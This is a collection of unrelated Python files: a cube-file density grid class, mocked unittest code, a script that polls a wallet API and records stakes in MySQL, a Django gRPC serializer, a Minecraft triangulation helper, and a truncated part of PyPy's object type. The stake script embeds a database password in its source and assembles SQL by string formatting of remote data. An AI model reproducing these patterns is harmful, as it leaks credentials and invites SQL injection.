self.grid[2]%6!=0: f.write("\n") def import_cub(self,filename): ''' Import data from density cube file Parameters ---------- filename : string Imput file name (.cub) including the path to file folder ''' origin=np.zeros(3,dtype='f8') self.grid=np.zeros(3,dtype='i8') step=np.zeros((3,3),dtype='f8') fid = open(filename,'r') # Open the file flines = fid.readlines() # Read the WHOLE file into RAM fid.close() # Close the file thisline = flines[2].split() Natom=np.abs(int(thisline[0])) if int(thisline[0]) < 0: self.type='mo' else: self.type='transition' self.at_charge=np.zeros(Natom,dtype='f') Coor=np.zeros((Natom,3),dtype='f8') for ii in range(3): origin[ii]=float(thisline[ii+1]) for kk in range(3): thisline = flines[kk+3].split() self.grid[kk]=int(thisline[0]) for ii in range(3): step[kk,ii]=float(thisline[ii+1]) # atomic information: for kk in range(Natom): thisline = flines[kk+6].split() self.at_charge[kk]=float(thisline[1]) for ii in range(3): Coor[kk,ii]=float(thisline[ii+2]) if self.type=='mo': thisline = flines[Natom+6].split() self.indx=int(thisline[1]) il=7 else: il=6 with position_units('Bohr'): self.coor=Coordinate(Coor) self.origin=origin.copy() self.step=step.copy() # read density self.data=np.zeros((self.grid[0],self.grid[1],self.grid[2]),dtype='f8') counter=np.zeros(3,dtype='i8') for kk in range(Natom+il,len(flines)): line = flines[kk] # The current line as string thisline = line.split() # The current line split into segments for ii in range(6): self.data[counter[0],counter[1],counter[2]]=float(thisline[ii]) counter[2]+=1 if counter[2]==self.grid[2]: counter[2]=0 counter[1]+=1 if counter[1]==self.grid[1]: counter[1]=0 counter[0]+=1 break def get_axes(self): """ Outputs x, y and z axis of the grid. ** Working only for grid oriented along coordinate axis (nonrotated grid)** Returns -------- x,y,z : numpy array of float (dimension Grid_Nx, Grid_Ny, Grid_Nz) Coordinates of grid points in coordinate axes """ print("Working only for nonrotated grid oriented along coordinate axes") x=np.arange(self.grid[0])*self.step[0,0]+self.origin[0] y=np.arange(self.grid[1])*self.step[1,1]+self.origin[1] z=np.arange(self.grid[2])*self.step[2,2]+self.origin[2] return x,y,z def copy(self): ''' Copy DensityGrid class variable into the new one Returns ---------- density_new : DensityGrid class New DensityGrid class variable with exactly the same values as the original one Notes ---------- We have to use this function because simple density_new=density_old only create pointer to the old density and therefore all changes in density_new would be also done on density_old and this is what we don't want ''' density_new = deepcopy(self) return density_new def move(self,dx,dy,dz): ''' Moves density grid in space Parameters ---------- dx,dy,dz : real Distance of density shift along x resp. y resp. z axis. ''' vec=np.array([dx,dy,dz],dtype='f8') self.origin=self.origin+vec self.coor.move(dx,dy,dz) def rotate(self,rotxy,rotxz,rotyz): ''' Rotate DENSITY in SPACE in positive rotational angle (if right thumb pointing in direction of axes fingers are pointing in positive rotation direction). First is rotation aroud z axes then around y axes and then around x axes. Parameters ---------- rotxy,rotxz,rotyz : real `rotxy` resp. `rotxz` resp. `rotyz` is angle in RADIANS of rotation around z resp. y resp. x axis in positive direction ''' # Rotation handled in atomic units #print('Pred rotaci') self._origin=RotateAndMove(np.array([self._origin]),0.0,0.0,0.0,rotxy,rotxz,rotyz) self.coor.rotate(rotxy,rotxz,rotyz) self._step=RotateAndMove(self._step,0.0,0.0,0.0,rotxy,rotxz,rotyz) #print('Po rotaci') def rotate_1(self,rotxy,rotxz,rotyz): ''' Rotate DENSITY in SPACE in negative rotational angle (if right thumb pointing in direction of axes fingers are pointing in positive rotation direction). First is rotation aroud x axes then around y axes and then around z axes. Inverse function to rotate(rotxy,rotxz,rotyz) Parameters ---------- rotxy,rotxz,rotyz : real `rotxy` resp. `rotxz` resp. `rotyz` is angle in RADIANS of rotation around z resp. y resp. x axis in positive direction ''' #print('Pred rotaci') self._origin=RotateAndMove_1(np.array([self._origin]),0.0,0.0,0.0,rotxy,rotxz,rotyz) self.coor.rotate_1(rotxy,rotxz,rotyz) self._step=RotateAndMove_1(self._step,0.0,0.0,0.0,rotxy,rotxz,rotyz) #print('Po rotaci') def center(self,indx_center,indx_x,indx_y): ''' Center density according to defined center and main axes Center atom will be in origin of coordinate system (will have [0.0,0.0,0.0] coordinates) and vector X will be pointing into direction of x axes and vector Y will be in xy plane. Vector X and Y are defined by atomic indexes. Parameters ---------- indx_center : int or list of int When `indx_center`=i it refers to atomic coordnitate of ith atom (counted from zero) => center=coor[i,:]. When `indx_center`=[i,j,k,..] than center is center of all listed atoms (average coordinate) => center=(coor[i,:]+coor[j,:]+coor[k,:]...)/N indx_x : int or list of int of length 2 or 4 When `indx_x`=i than vector X is defined as Coor[i,:]-center. When `indx_x`=[i,j] than vector X is defined as Coor[j,:]-Coor[i,:]. When `indx_x`=[i,j,k,l] than vector X is defined as (Coor[j,:]-Coor[i,:])+(Coor[l,:]-Coor[k,:]). indx_y : int or list of int of length 2 or 4 When `indx_y`=i than vector Y is defined as Coor[i,:]-center. When `indx_y`=[i,j] than vector Y is defined as Coor[j,:]-Coor[i,:]. When `indx_y`=[i,j,k,l] than vector Y is defined as (Coor[j,:]-Coor[i,:])+(Coor[l,:]-Coor[k,:]). ''' Coor_ext=[] for ii in range(len(self.coor._value)): Coor_ext.append(self.coor._value[ii]) Coor_ext.append(self._origin) Coor_ext=np.array(Coor_ext) Coor_centered,Phi,Psi,Chi,center=CenterMolecule(Coor_ext,indx_center,indx_x,indx_y,print_angles=True) with position_units("Bohr"): self.coor=Coordinate(Coor_centered[0,:]) for ii in range(1,len(Coor_centered)-1): self.coor.add_coor(Coor_centered[ii,:]) self._origin=Coor_centered[len(self.coor._value),:] self._step=RotateAndMove(self._step,0.0,0.0,0.0,Phi,Psi,Chi) def dipole(self,output_center=False): ''' Calculate numericaly dipole from density. For ground state electron density it calculates ground state dipole and fror transition density it calculates transition dipole Returns ---------- dipole : numpy.array of real (dimension 3) dipole in ATOMIC UNITS (e*bohr) Notes ---------- It calculates Int{-r.rho(r)dxdydz} which is dipole ''' # TODO: repair matrix approach to be used also for rotated density if 0: # This works only for nonrotated grid - change but keep the idea grid=Grid() grid.init_from_cub(self) dipole=np.zeros(3,dtype='f8') dipole[0]=np.sum(np.multiply(grid.X,self.data)) dipole[1]=np.sum(np.multiply(grid.Y,self.data)) dipole[2]=np.sum(np.multiply(grid.Z,self.data)) dipole = -np.multiply(grid.ddV,dipole) dV=np.dot(self.step[0,:],np.cross(self.step[1,:],self.step[2,:])) dipole=np.multiply(-dV,dipole) return dipole else: # more efficient would be to create 3D grids with coordinates then multiply and then sum all dipole = np.zeros(3,dtype='f8') center = np.zeros(3,dtype='f8') for ii in range(self.grid[0]): for jj in range(self.grid[1]): for kk in range(self.grid[2]): rr=self._origin+ii*self._step[0,:]+jj*self._step[1,:]+kk*self._step[2,:] dipole+=self.data[ii,jj,kk]*rr center+=np.abs(self.data[ii,jj,kk])*rr dV=np.dot(self._step[0,:],np.cross(self._step[1,:],self._step[2,:])) dipole=dipole*dV center = center/np.sum(np.abs(self.data)) print('Dipole calculated by function dipole was chaged from -dipole to dipole. Make sure that you are using right value') if output_center: return -dipole,center else: return -dipole def dipole_partial(self,x_min=None,x_max=None,y_min=None,y_max=None,z_min=None,z_max=None): ''' Calculate numericaly dipole from part of the density. For ground state electron density it calculates ground state partial dipole and from transition density it calculates partial transition dipole. Parameters ---------- x_min,x_max : real (optional - init=None) Specifies minimal and maximal x coordinate between which density is used for calculation of dipole. If some of those values are not specified there is taken minimal resp. maximal x coordinate of the density. y_min,y_max : real (optional - init=None) Specifies minimal and maximal y coordinate between which density is used for calculation of dipole. If some of those values are not specified there is taken minimal resp. maximal y coordinate of the density. z_min,z_max : real (optional - init=None) Specifies minimal and maximal z coordinate between which density is used for calculation of dipole. If some of those values are not specified there is taken minimal resp. maximal z coordinate of the density. Returns ---------- dipole : numpy.array of real (dimension 3) dipole in ATOMIC UNITS (e*bohr) Notes Resulting dipole is numericaly calculated integral Int_{x_min,y_min,z_min}^{x_max,y_max,z_max} (-r.rho(r))dxdydz ''' if x_min==None: x_min=-1.0e5 else: x_min=PositionUnitsManaged.manager.convert_position_2_internal_u(x_min) if x_max==None: x_max=1.0e5 else: x_max=PositionUnitsManaged.manager.convert_position_2_internal_u(x_max) if y_min==None: y_min=-1.0e5 else: y_min=PositionUnitsManaged.manager.convert_position_2_internal_u(y_min) if y_max==None: y_max=1.0e5 else: y_max=PositionUnitsManaged.manager.convert_position_2_internal_u(y_max) if z_min==None: z_min=-1.0e5 else: z_min=PositionUnitsManaged.manager.convert_position_2_internal_u(z_min) if z_max==None: z_max=1.0e5 else: z_max=PositionUnitsManaged.manager.convert_position_2_internal_u(z_max) # TODO: Convert boundaries from current values to internal #print(x_min,x_max,y_min,y_max,z_min,z_max) dipole=np.zeros(3,dtype='f8') for ii in range(self.grid[0]): for jj in range(self.grid[1]): for kk in range(self.grid[2]): rr=self._origin+ii*self._step[0,:]+jj*self._step[1,:]+kk*self._step[2,:] if rr[0]>=x_min and rr[0]<=x_max and rr[1]>=y_min and rr[1]<=y_max and rr[2]>=z_min and rr[2]<=z_max: dipole+=self.data[ii,jj,kk]*rr dV=np.dot(self._step[0,:],np.cross(self._step[1,:],self._step[2,:])) dipole=dipole*dV print('Dipole calculated by function dipole_partial was chaged from -dipole to dipole. Make sure that you are using right value') return -dipole def cut(self,x_min=None,x_max=None,y_min=None,y_max=None,z_min=None,z_max=None): ''' Takes a cut of density. **Works only for original (nonrotated) transition density with step[0,:] pointing along x axis, step[1,:] pointing along y axis and step[2,:] pointing along z axis.** Parameters ---------- x_min,x_max : real (optional - init=None) Specifies minimal and maximal x coordinate in ATOMIC UNITS (Bohr) between which density is outputed. If some of those values are not specified there is taken minimal resp. maximal x coordinate of the density y_min,y_max : real (optional - init=None) Specifies minimal and maximal y coordinate in ATOMIC UNITS (Bohr) between which density is outputed. If some of those values are not specified there is taken minimal resp. maximal y coordinate of the density z_min,z_max : real (optional - init=None) Specifies minimal and maximal z coordinate in ATOMIC UNITS (Bohr) between which density is outputed. If some of those values are not specified there is taken minimal resp. maximal z coordinate of the density Returns ---------- cuted_density : DensityGrid class DensityGrid class with desity which is subsystem of original density and it is defined on grid points with coordinates: x_min <= x <= x_max, y_min <= y <= y_max and z_min <= z <= z_max. ''' if x_min==None: if self._step[0,0]>0: x_min=self._origin[0] else: x_min=self._origin[0]+self._step[0,0]*(self.grid[0]-1) else: x_min=PositionUnitsManaged.manager.convert_position_2_internal_u(x_min) if x_max==None: if self._step[0,0]>0: x_max=self._origin[0]+self._step[0,0]*(self.grid[0]-1) else: x_max=self._origin[0] else: x_max=PositionUnitsManaged.manager.convert_position_2_internal_u(x_max) if y_min==None: if self._step[1,1]>0: y_min=self._origin[1] else: y_min=self._origin[1]+self._step[1,1]*(self.grid[1]-1) else: y_min=PositionUnitsManaged.manager.convert_position_2_internal_u(y_min) if y_max==None: if self._step[1,1]>0: y_max=self._origin[1]+self._step[1,1]*(self.grid[1]-1) else: y_max=self._origin[1] else: y_max=PositionUnitsManaged.manager.convert_position_2_internal_u(y_max) if z_min==None: if self._step[2,2]>0: z_min=self._origin[2] else: z_min=self._origin[2]+self._step[2,2]*(self.grid[2]-1) else: z_min=PositionUnitsManaged.manager.convert_position_2_internal_u(z_min) if z_max==None: if self._step[2,2]>0: z_max=self._origin[2]+self._step[2,2]*(self.grid[2]-1) else: z_max=self._origin[2] else: z_max=PositionUnitsManaged.manager.convert_position_2_internal_u(z_max) #print(x_min,x_max,y_min,y_max,z_min,z_max) x=[0,0] if self._step[0,0]>0: for ii in range(self.grid[0]): if self._origin[0]+self._step[0,0]*ii<x_min: x[0]=ii+1 elif self._origin[0]+self._step[0,0]*ii>x_max and x[1]==0: x[1]=ii-1 if x[1]==0: x[1]=self.grid[0] else: for ii in range(self.grid[0]): if self._origin[0]+self._step[0,0]*ii>x_max: x[0]=ii+1 elif self._origin[0]+self._step[0,0]*ii<x_min and x[1]==0: x[1]=ii-1 if x[1]==0: x[1]=self.grid[0] y=[0,0] if self._step[1,1]>0: for ii in range(self.grid[1]): if self._origin[1]+self._step[1,1]*ii<y_min: y[0]=ii+1 elif self._origin[1]+self._step[1,1]*ii>y_max and y[1]==0: y[1]=ii-1 if y[1]==0: y[1]=self.grid[1] else: for ii in range(self.grid[1]): if self._origin[1]+self._step[1,1]*ii>y_max: y[0]=ii+1 elif self._origin[1]+self._step[1,1]*ii<y_min and y[1]==0: y[1]=ii-1 if y[1]==0: y[1]=self.grid[0] z=[0,0] if self._step[2,2]>0: for ii in range(self.grid[2]): if self._origin[2]+self._step[2,2]*ii<z_min: z[0]=ii+1 elif self._origin[2]+self._step[2,2]*ii>z_max and z[1]==0: z[1]=ii-1 if z[1]==0: z[1]=self.grid[2] else: print('z is negative') for ii in range(self.grid[2]): if self._origin[2]+self._step[2,2]*ii>z_max: z[0]=ii+1 elif self._origin[2]+self._step[2,2]*ii<z_min and z[1]==0: z[1]=ii-1 if z[1]==0: z[1]=self.grid[2] #print(x,y,z) origin_new=self._origin[:]+self._step[0,:]*x[0]+self._step[1,:]*y[0]+self._step[2,:]*z[0] grid_new=np.array([x[1]-x[0],y[1]-y[0],z[1]-z[0]]) data_new=self.data[x[0]:x[1],y[0]:y[1],z[0]:z[1]] step_new=np.copy(self._step) with position_units("Bohr"): cuted_density=DensityGrid(origin_new,grid_new,step_new,data_new,typ=np.copy(self.type),mo_indx=np.copy(self.indx),Coor=np.copy(self.coor.value),At_charge=np.copy(self.at_charge)) return cuted_density def calc_atomic_properties(self): ''' Calculate atomic charges and atomic dipoles by numericaly integrating density. Fisrt it is determined to which atom the grid point is the closest and to this atom small delta charge and dipole is added. Atomic charges are calculated as a sum of density from grid points for which this atom is the closest one. The atomic dipoles are calculated as vector from atom to grid point multiplied by density. Returns ---------- charges : numpy.array of real (dimension Natoms) Atomic charges for every atom of the system dipoles : numpy.array of real (dimension Natoms x 3) Atomic dipole in ATOMIC UNITS (e*bohr) for every atom ''' Nat=len(self.coor._value) charges=np.zeros(Nat,dtype='f8') dipoles=np.zeros((Nat,3),dtype='f8') for ii in range(self.grid[0]): for jj in range(self.grid[1]): for kk in range(self.grid[2]): rr=self._origin+ii*self._step[0,:]+jj*self._step[1,:]+kk*self._step[2,:] dist_min=30.0 index=0 for ll in range(len(self.coor._value)): dist=np.sqrt(np.dot(rr-self.coor._value[ll],rr-self.coor._value[ll])) if dist<dist_min: index=ll dist_min=np.copy(dist) charges[index]+=self.data[ii,jj,kk] dipoles[index,:]+=(rr-self.coor._value[index])*self.data[ii,jj,kk] dV=np.dot(self._step[0,:],np.cross(self._step[1,:],self._step[2,:])) print('Atomic dipole calculated by function calc_atomic_properties was chaged from -dipole to dipole. Make sure that you are using right value') return charges*dV,-dipoles*dV def _elpot_at_position(self,position): ''' Calculate electrostatic potential for electronic density assumed that it is composed of cubic boxes with homogenous charge distribition **THIS IS WERY CRUDE APPROXIMATION AND I HAVE SHOWN BY COMPARING CALCULATED POTENTIAL FROM ATOMIC ORBITALS WITH THIS ONE THAT IT DOESN'T PROVIDE (NOT EVEN CLOSE TO) REAL POTENTIAL** Parameters ---------- position : numpy.array of real (dimension 3) Coordinates in ATOMIC UNITS (Bohr) of point where we would like to calculate electrostatic potential Returns ---------- result : real Potential at `position` in ATOMIC UNITS ''' result=0.0 def aux_function(rr,stepx,stepy,stepz,t): res=scipy.special.erf(t*(stepx/2-rr[0]))+scipy.special.erf(t*(stepx/2+rr[0])) res=res * (scipy.special.erf(t*(stepy/2-rr[1]))+scipy.special.erf(t*(stepy/2+rr[1]))) res=res * (scipy.special.erf(t*(stepz/2-rr[2]))+scipy.special.erf(t*(stepz/2+rr[2]))) res=res/t**3 return res rr1=np.copy(position) for m in range(self.grid[0]): for n in range(self.grid[1]): for o in range(self.grid[2]): rr2=self._origin + m*self._step[0,:]+n*self._step[1,:]+o*self._step[2,:] dr=rr1-rr2 tmax=max([5/np.abs(np.abs(dr[0])-np.abs(self._step[0,0]/2)),5/np.abs(np.abs(dr[1])-np.abs(self._step[1,1]/2)),5/np.abs(np.abs(dr[2])-np.abs(self._step[2,2]/2))]) #if tmax<5e-1: # ESP_Grid[i,j,k]-=self.data[m,n,o]/np.sqrt(np.dot(dr,dr))*dV #else: tmax=max([200,tmax]) aux_function_partial = partial(aux_function,dr,self._step[0,0],self._step[1,1],self._step[2,2]) result-=self.data[m,n,o]*np.pi/4*scipy.integrate.quadrature(aux_function_partial,0,tmax,tol=1e-05,maxiter=100)[0] return result def _dens_to_ESP2(self): ''' This should create electrostatic potential grid file from electronic density assumed that it is composed of cubic boxes with homogenous charge distribition. **THIS IS WERY CRUDE APPROXIMATION AND I HAVE SHOWN BY COMPARING CALCULATED POTENTIAL FROM ATOMIC ORBITALS WITH THIS ONE THAT IT DOESN'T PROVIDE (NOT EVEN CLOSE TO) REAL POTENTIAL** ''' ESP=DensityGrid(self.origin,self.grid,self.step,None,Coor=self.coor.value,At_charge=self.at_charge) ''' Calculate volume element ''' vecX=np.copy(self._step[0,:]) vecY=np.copy(self._step[1,:]) vecZ=np.cross(vecX,vecY) dV=np.dot(vecZ,self._step[2,:]) ESP._origin=ESP._origin+self._step[0,:]/2.0+self._step[1,:]/2.0+self._step[2,:]/2.0 ESP_Grid=np.zeros((self.grid[0],self.grid[1],self.grid[2]),dtype='f8') def aux_function(rr,stepx,stepy,stepz,t): res=scipy.special.erf(t*(stepx/2-rr[0]))+scipy.special.erf(t*(stepx/2+rr[0])) res=res * (scipy.special.erf(t*(stepy/2-rr[1]))+scipy.special.erf(t*(stepy/2+rr[1]))) res=res * (scipy.special.erf(t*(stepz/2-rr[2]))+scipy.special.erf(t*(stepz/2+rr[2]))) res=res/t**3 return res for i in range(ESP.grid[0]): print(i,'/',ESP.grid[0]) for j in range(ESP.grid[1]): for k in range(ESP.grid[2]): rr1=ESP._origin + i*ESP._step[0,:]+j*ESP._step[1,:]+k*ESP._step[2,:] for m in range(self.grid[0]): for n in range(self.grid[1]): for o in range(self.grid[2]): rr2=self._origin + m*self._step[0,:]+n*self._step[1,:]+o*self._step[2,:] dr=rr1-rr2 tmax=max([5/np.abs(np.abs(dr[0])-np.abs(self._step[0,0]/2)),5/np.abs(np.abs(dr[1])-np.abs(self._step[1,1]/2)),5/np.abs(np.abs(dr[2])-np.abs(self._step[2,2]/2))]) if tmax<5e-1: ESP_Grid[i,j,k]-=self.data[m,n,o]/np.sqrt(np.dot(dr,dr))*dV else: tmax=max([200,tmax]) aux_function_partial = partial(aux_function,dr,self._step[0,0],self._step[1,1],self._step[2,2]) ESP_Grid[i,j,k]-=self.data[m,n,o]*np.sqrt(np.pi)/4*scipy.integrate.quadrature(aux_function_partial,0,tmax,tol=1e-05,maxiter=100)[0] ESP_Grid[i,j,k]-=np.pi/tmax**2*self.data[i,j,k] #ESP_Grid=ESP_Grid #for m in range(ESP.grid[0]): # for n in range(ESP.grid[1]): # for o in range(ESP.grid[2]): # for ii in range(len(self.coor)): # dr=ESP.origin + m*ESP.step[0,:]+n*ESP.step[1,:]+o*ESP.step[2,:]-self.coor[ii] # norm2=np.sqrt(np.dot(dr,dr)) # ESP_Grid[m,n,o]+=self.at_charge[ii]/norm2 ESP.data=np.copy(ESP_Grid) return ESP
nilq/baby-python
python
from unittest import TestCase from unittest.mock import patch import getting_logs class TestGetLog(TestCase): """Testing of getting logs from a third-party resource. Testing the correctness of the transmitted data for saving to the database.""" @classmethod def setUpClass(cls): super().setUpClass() cls.data = { 'error': '', 'logs': [{ 'сreated_at': '2021-01-23T12:33:14', 'first_name': 'А', 'message': 'Write the code!', 'second_name': 'B', 'user_id': '123456' }] } cls.error = { 'error': 'created_day: does not match format 20200105' } @patch('getting_logs.GetLog') def test_logs_get(self, MockGetLog): """Tests getting logs.""" logs = MockGetLog() logs.get.return_value = self.data response = logs.get() self.assertIsNotNone(response, 'Ошибка. Пустой объект.') self.assertIsInstance(response, dict, 'Ошибка. Получен не json.') self.assertEqual( response, logs.get.return_value, 'Ошибка. Получены неверные данные.') @patch('getting_logs.GetLog') def test_error_get(self, MockGetLog): """Tests getting logs.""" logs = MockGetLog() logs.get.return_value = self.error response = logs.get() self.assertIsNotNone(response, 'Ошибка. Пустой объект.') self.assertIsInstance(response, dict, 'Ошибка. Получен не json.') self.assertEqual(response, logs.get.return_value, 'Ошибка. Получены неверные данные.') @patch('getting_logs.GetLog') def test_saving_logs(self, MockGetLog): """Tests the correctness of the transmitted data.""" get_log = MockGetLog() get_log.get.return_value = self.data logs = get_log.get() get_log.saving_logs(logs) self.assertEqual(MockGetLog, getting_logs.GetLog) self.assertIsNotNone(MockGetLog.called) get_log.get.assert_called_with() get_log.saving_logs.assert_called_once_with(get_log.get.return_value)
nilq/baby-python
python
# coding: utf8 import requests import json import os import time import pymysql.cursors connection = pymysql.connect(host='127.0.0.1', port=3306, user='ub', password='UB@018_world_cup', db='db_world_cup', charset='utf8mb4', cursorclass=pymysql.cursors.DictCursor) g_stake_address = [ '18QQJNannotKo2Q9CkiqBJcf4qZWANZvGM', '16JUBxCKb5LsQP7pZANc2yWpqvv4Xxqpw5', '17ThubQK723mnUAhJyQ5g3y7WGExMu5X1d', # '1BdR8SFVB67JbLdbtJBagN4oFGvUGYqUjh', '1EvSWArvHhg2LxDBBSqDmyabqKpJXh2dVW', '1Kn4scG7XnyHkWS8JXBEnHv1rHZuatKK1r', '141fdMZPSXyx1Ym73Tf7f5PgLrw4sTaRcG', '13QXEiy8nfSiZa5co2bMCcKXbbDTCUaqPd', '1EiiEpwmueb5gnPaf83QMfpZZa6NHa5xyu', '1Q82uttbmSsiTSb3xkk16u5bY3Vd8NJi1k', '1NCbHsPT7ET1W5M1eUxfdRnecUHKWifLey', '12fZL8ujSoDyf1JGG5bwTZveMfpBnKNbjK', '1DvETyyKTNbTVi8YFeqJcQGMz6PAbsgSc2', '1N91rYn2vcuZH9twrx9sZEbMD1Va4oxb8M', '16K7C5qHL7mRY31Wu4dGXx6DgHrHvrPMEm', '16VCNicr93VhLQuFgJaXu8JmbJubA68fnS', '17gEQUDzoBucaDb5yNVf7h9RwzR8h8ndWc', '19JrzBCwat2yEy2Y7LZpkKozgffCNoc5mz', '1Axnf6NNABo8VnDyFYk7FEajuNtSFjRYZw', '13BauCmfa5JNoHxtQaeWoWT1Xqwree6HZx', '1BYunn44TecdU1tRWtSnxpPhYbAA99rGm1', '18L1zzKrNwL2Huov1iUdCuUr1HE1e7tFLk', '18hsZYuXmD2oBHdxnWLTqVAaX9Ge7t8KxB', '1FNNeq9Wpq1TQ2C1iLYQL3zn3BHAkh12dp', '15hoi9mLw53ATgMdtwdMgtJUUin6cTwxYc', '19Eb7zndhKVVozm4AD9e3KtxbESBvZZqLa', '1KdK3LMNjrPaRhn7i3evGX5uxBhhP2nTsw', '1HpTt76LdQG21QFttRtNGPqTcF6Tjbh2hY', '1NK6KkGo1uYCq1Xv4GZ9gL3217UbqbFygP', '15amvgyWfrCyFtr1r1NXX3GLoAzUX6pE2w', '1BaTnykKitJ5mG8RJXfR1YNbcnDF8ZDHcF', '12LGWm2ovNiKVafAm9GbEmDbQdz7ezGeto', '1FbQBr2fg9aQyJp1HhsENFGo6tdcNjpguc' ] class StateManager(object): def __init__(self): self.id_file = 'id_file' try: f = os.open(self.id_file, os.O_RDONLY) self.latest_id = os.read(f, 10) os.close(f) if self.latest_id is None: self.latest_id = '1' else: self.latest_id = self.latest_id.decode('ascii') except: self.latest_id = '1' def get_last_id(self): return self.latest_id def increase_last_id(self, id): if id > self.latest_id: self.latest_id = id def save_latest_id(self): try: os.remove(self.id_file) except: pass f = os.open(self.id_file, os.O_WRONLY | os.O_TRUNC | os.O_CREAT) os.write(f, self.latest_id.encode('ascii')) os.close(f) print(self.latest_id) def __del__(self): self.save_latest_id() def update_database(address, count, time, item, isAnybit): cursor = connection.cursor() sql = "INSERT INTO `t_stake` (`address`, `count`, `time`, `type`, `item`, `txid`, `isAnybit`) VALUES ('%s', %d, '%s', 2, %d, '', %d) ON DUPLICATE KEY UPDATE count=VALUES(count)" % \ (address, count, time, item, isAnybit) cursor.execute(sql) connection.commit() def get_latest_transaction(last_id, address, item): query_trans_request = '''{ "header": { "version": "1.0.1", "language": "zh", "trancode": "tran_page", "clienttype": "Android", "walletid": "927fc097c3567fe119cde85529fb7630fc1b690a", "random": "123456", "handshake": "abcdefg", "imie": "abcdefg" }, "body": { "coinAddr":"%s", "coinType":"UBTC", "queryType":"1", "lastId":%d, "limit":10 } } ''' % (address, int(last_id)) query_headers = {'Content-Type': "application/json"} # print(query_trans_request) response = requests.post('https://www.anybit.io/server/process/', data=query_trans_request, headers=query_headers) # response = requests.post('http://192.168.1.220:8080/lightwallet/server/process', data=query_trans_request, headers=query_headers) # print(response.text) records = json.loads(response.text)['data']['trans'] latest_id = int(last_id) for r in records: print(r['targetAddr'] + ': ' + str(r['tranAmt'])) if latest_id < r['id']: latest_id = r['id'] if 'source' in r and r['source'] == 1: count = int(float(r['tranAmt']) * 10 * 5 / 4) isAnybit = 1 else: count = int(float(r['tranAmt']) * 10) isAnybit = 0 if count <= 0: continue ctime = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(r['createTime'] / 1000)) # item = g_stake_address.index(r['targetAddr']) print(r['targetAddr'], count, ctime, item) update_database(r['targetAddr'], count, ctime, item, isAnybit) return latest_id if __name__ == '__main__': sm = StateManager() while True: item = 1 for a in g_stake_address: last_id = get_latest_transaction(sm.get_last_id(), a, item) item += 1 sm.increase_last_id(str(last_id)) sm.save_latest_id() time.sleep(30) # print('end: ', sm.get_last_id())
nilq/baby-python
python
from .bar import f
nilq/baby-python
python
from django.contrib.auth.models import User from django_grpc_framework import proto_serializers import account_pb2 class UserProtoSerializer(proto_serializers.ModelProtoSerializer): class Meta: model = User proto_class = account_pb2.User fields = ['id', 'username', 'email', 'groups']
nilq/baby-python
python
from minecraftmath import calculator from system import window_management as wm xFirThr = 0 zFirThr = 0 angleFirThr = 0 def findSecondSuggestedThrow(startPosX, startPosZ, startAngle): global xFirThr, zFirThr, angleFirThr xFirThr = startPosX zFirThr = startPosZ angleFirThr = startAngle inRing, distance = calculator.distanceFromOrigin(xFirThr, zFirThr) if inRing: return (0,0,calculator.convertToMinecraftAngle(angleFirThr, inRing=True), distance) else: xSugThr, zSugThr = calculator.calculateSecondThrowCoordinates(*calculator.calculateHitRing(xFirThr, zFirThr, angleFirThr)) angleSugThr = calculator.calculateAngleAToB(xFirThr, zFirThr, xSugThr, zSugThr) return (xSugThr, zSugThr, angleSugThr) def findStronghold(startPosX, startPosZ, startAngle): global xFirThr, zFirThr, angleFirThr xStronghold, zStronghold = calculator.calculateStrongholdCoordinates(xFirThr, zFirThr, angleFirThr, startPosX, startPosZ, startAngle) angleStronghold = calculator.calculateAngleAToB(startPosX, startPosZ, xStronghold, zStronghold) return (xStronghold, zStronghold, angleStronghold)
nilq/baby-python
python
"""The builtin object type implementation""" from pypy.interpreter.baseobjspace import W_Root from pypy.interpreter.error import OperationError, oefmt from pypy.interpreter.gateway import applevel, interp2app, unwrap_spec from pypy.interpreter.typedef import ( GetSetProperty, TypeDef, default_identity_hash) from pypy.objspace.descroperation import Object app = applevel(r''' def _abstract_method_error(typ): methods = ", ".join(sorted(typ.__abstractmethods__)) err = "Can't instantiate abstract class %s with abstract methods %s" raise TypeError(err % (typ.__name__, methods)) def reduce_1(obj, proto): import copyreg return copyreg._reduce_ex(obj, proto) def _getstate(obj): cls = obj.__class__ try: getstate = obj.__getstate__ except AttributeError: # and raises a TypeError if the condition holds true, this is done # just before reduce_2 is called in pypy state = getattr(obj, "__dict__", None) # CPython returns None if the dict is empty if state is not None and len(state) == 0: state = None names = slotnames(cls) # not checking for list if names is not None: slots = {} for name in names: try: value = getattr(obj, name) except AttributeError: pass else: slots[name] = value if slots: state = state, slots else: state = getstate() return state def reduce_2(obj, proto, args, kwargs): cls = obj.__class__ if not hasattr(type(obj), "__new__"): raise TypeError("can't pickle %s objects" % type(obj).__name__) import copyreg if not isinstance(args, tuple): raise TypeError("__getnewargs__ should return a tuple") if not kwargs: newobj = copyreg.__newobj__ args2 = (cls,) + args elif proto >= 4: newobj = copyreg.__newobj_ex__ args2 = (cls, args, kwargs) else: raise ValueError("must use protocol 4 or greater to copy this " "object; since __getnewargs_ex__ returned " "keyword arguments.") state = _getstate(obj) listitems = iter(obj) if isinstance(obj, list) else None dictitems = iter(obj.items()) if isinstance(obj, dict) else None return newobj, args2, state, listitems, dictitems def slotnames(cls): if not isinstance(cls, type): return None try: return cls.__dict__["__slotnames__"] except KeyError: pass import copyreg slotnames = copyreg._slotnames(cls) if not isinstance(slotnames, list) and slotnames is not None: raise TypeError("copyreg._slotnames didn't return a list or None") return slotnames ''', filename=__file__) _abstract_method_error = app.interphook("_abstract_method_error") reduce_1 = app.interphook('reduce_1') reduce_2 = app.interphook('reduce_2') class W_ObjectObject(W_Root): """Instances of this class are what the user can directly see with an 'object()' call.""" def _excess_args(__args__): return bool(__args__.arguments_w) or bool(__args__.keywords) def descr__new__(space, w_type, __args__): from pypy.objspace.std.typeobject import _precheck_for_new w_type = _precheck_for_new(space, w_type) if _excess_args(__args__): w_parent_new, _ = space.lookup_in_type_where(w_type, '__new__') w_parent_init, _ = space.lookup_in_type_where(w_type, '__init__') w_parent_new, _ = space.lookup_in_type_where(w_type, '__new__') if (w_parent_init is space.w_object or w_parent_new is not space.w_object): raise oefmt(space.w_TypeError, "object() takes no parameters") if w_type.is_abstract(): _abstract_method_error(space, w_type) return space.allocate_instance(W_ObjectObject, w_type) def descr___subclasshook__(space, __args__): return space.w_NotImplemented def descr__init__(space, w_obj, __args__): if _excess_args(__args__): w_type = space.type(w_obj) w_parent_init, _ = space.lookup_in_type_where(w_type, '__init__') w_parent_new, _ = space.lookup_in_type_where(w_type, '__new__') w_parent_init, _ = space.lookup_in_type_where(w_type, '__init__') if 